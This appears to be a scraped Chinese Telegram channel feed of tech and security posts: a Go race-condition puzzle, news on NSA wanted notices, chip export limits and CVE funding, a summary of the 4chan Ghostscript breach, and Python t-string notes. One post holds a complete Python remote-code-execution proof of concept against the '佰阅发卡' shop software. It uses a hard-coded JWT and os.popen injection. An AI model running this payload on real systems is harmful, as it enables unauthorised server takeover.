Puddin在TG上看到了啥
782 subscribers
1.67K photos
70 videos
87 files
2.44K links
会把想要收藏的东西堆在这里
#日常 #数码 #科技 #渗透 #碎碎念
Download Telegram
看门狗(确信)
请找出图中的漏洞,绕过safe = blackJack(name)

解:

图中的safe = blackJack(name)是赋值而不是创建变量

所以可以用条件竞争,让 ... safe := os.Open(...夹在safe = blackJack(name)safe != nil 中间执行,把本来不为nil的safe变量强行变为nil

这就是新生赛的含金量吗
🤯4
果然并发是万恶之源
This media is not supported in your browser
VIEW IN TELEGRAM
🥰2
哈尔滨市公安局公开通缉3名美国国家安全局(NSA)特工
为依法严厉打击境外势力对我网络攻击窃密犯罪,切实维护国家网络空间安全和人民生命财产安全,黑龙江省哈尔滨市公安局决定对3名隶属于美国国家安全局(NSA)的犯罪嫌疑人凯瑟琳·威尔逊(Katheryn A. Wilson)、罗伯特·思内尔(Robert J. Snelling)、斯蒂芬·约翰逊(Stephen W. Johnson)进行通缉。
#吃瓜
👏2
🚾📦
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from LoopDNS资讯播报
美国政府决定无限期限制英伟达对中国出口专用人工智能(AI)芯片"H20"的出口。 当初感觉到放宽限制的氛围,期待恢复出口,但最近随着中国对美国产品征收报复关税,美国再次转向勒紧限制缰绳的方向。

来源:每日经济 / Wall St Engine
Forwarded from 科技圈🎗在花频道📮
美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”(CVE),由政府提供的资金将于本周三到期,或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石,为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧,一旦CVE漏洞数据库停摆,将严重冲击全球漏洞管理与应变机制,对企业和 CERT(电脑紧急应变小组)等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天
😱3
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())



https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
Forwarded from [Patience Forever] (₴łⱠVɆⱤ₩ØⱠ₣)
4chan黑客攻击细节:4chan使用了2012年版本的GhostScript用于解析PDF并生成缩略图。然而由于他们没有判断PDF文件是否为真实的PDF,因此可以上传包含PostScript命令的恶意文件触发RCE,随后黑客找到了配置错误的SUID文件进行提权

https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
Forwarded from Pseudorandom Thoughts
https://www.kandji.io/blog/pasivrobber

TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多

Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
:你们美国OSINT就不能至少要求一下,做中国威胁情报一定要懂汉语
:错了 做中国情报一定要不懂汉语(
不然就不好意思喊了
😁1
Forwarded from Hacker News
Python's new t-strings (Score: 154+ in 5 hours)

Link: https://readhacker.news/s/6t8rs
Comments: https://readhacker.news/c/6t8rs
python3.14新功能t-string, 表示一个模板

python3.13之前:

name = "World"
print("Hello {name}!".format(name)) # "Hello {name}!"是一个字符串

python3.14:
name = "World"
print(t"Hello {name}!") #一个Template对象,需要用其他函数转成字符串

可以用来替代模板渲染引擎,SSTI再也不会导致RCE了(悲)
evil = "<script>alert('bad')</script>"
template = t"<p>{evil}</p>"
safe = html(template)
assert safe == "<p>&lt;script&gt;alert('bad')&lt;/script&gt;</p>"